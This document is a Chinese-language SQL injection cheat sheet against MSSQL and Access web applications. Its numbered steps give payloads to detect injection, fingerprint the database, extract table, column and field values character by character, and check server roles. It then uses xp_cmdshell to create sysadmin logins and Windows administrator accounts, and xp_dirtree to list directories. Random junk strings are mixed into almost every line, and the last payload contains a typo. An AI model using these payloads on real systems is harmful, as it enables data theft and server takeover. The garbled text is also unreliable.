1.判断是否有注入;and 1=1 ;and 1=2 N9-7YQ`D
2.初步判断是否是mssql ;and user>0 -z0;4O (K]
`;J`O02
3.注入参数是字符'and [查询条件] and ''=' YWvD+
,w3-*z
4.搜索时没过滤参数的'and [查询条件] and '%25'=' qz{9ND|)
M/dgW`c
5.判断数据库系统 >36,lNt
X;N?L%Pp
;and (select count(*) from sysobjects)>0 mssql ^'0N%`bY!
hlB\Xt
;and (select count(*) from msysobjects)>0 access (+[%^96
xcU!bDV
^9:`D@Z+
V`1{*PrI@L
6.猜数据库 ;and (select Count(*) from [数据库名])>0 U/^#nU.,
6]Is"3ca
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 ^n(FO,8c
D2kmBZ3
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 t15{>>f4>
0B7G:X0
9.(1)猜字段的ascii值(access) XFvl
L_RVHvA=M/
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 6UuN-7z!"
]LUcOR
(2)猜字段的ascii值(mssql) HyVV,q^E
ws+ '*7
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 ,>h"~X
o+'|j#P
10.测试权限结构(mssql) Y~85Z0l
gS5MoW1
_ERtL5^
G<n75!
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- M|mfkIk0MB
O5 73AA
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- zMFTkDY
K F_fz
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- n@RmH>"
/*T^7Y&
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- suwR`2
"!V`_ S;
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- kpIn_Ea
Z%]K,9K
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- (.cA'f?h
r|u[36NmA
;and 1=(select IS_MEMBER('db_owner'));-- .Y;f9R
TA-2{=8
:LY.C<8
Ee2P]4_d
11.添加mssql和系统的帐户 "u!gfG?oH
2c 0;P
#ol
;exec master.dbo.sp_addlogin username;-- 5MaN
{*)l
;exec master.dbo.sp_password null,username,password;-- V;xPZ2C;
,<t.Iz%
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- fq6Obh=A#
@6>Q&GYqt
;exec master.dbo.xp_cmdshell 'net user username password E6TeZ%g
0BlEt1e2T
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- hbH~Ya=+S
<v|"eq}
;exec master.dbo.xp_cmdshell 'net user username password /add';-- ,bl }@0A
]yf?i350
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- ^EX"fRwNi
cZNcplt8
M/=36{,w-
,r w4Lo
12.(1)遍历目录 k8+J7(_c
hhy+bA}
;create table dirs(paths varchar(100), id int) )bOfs*S
z/1$G"
;insert dirs exec master.dbo.xp_dirtree 'c:\' =#Sw.N
at_*Zh(
;and (select top 1 paths from dirs)>0 MONX&$
]u|v7}I4
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) n9+33^ PT
E{u6<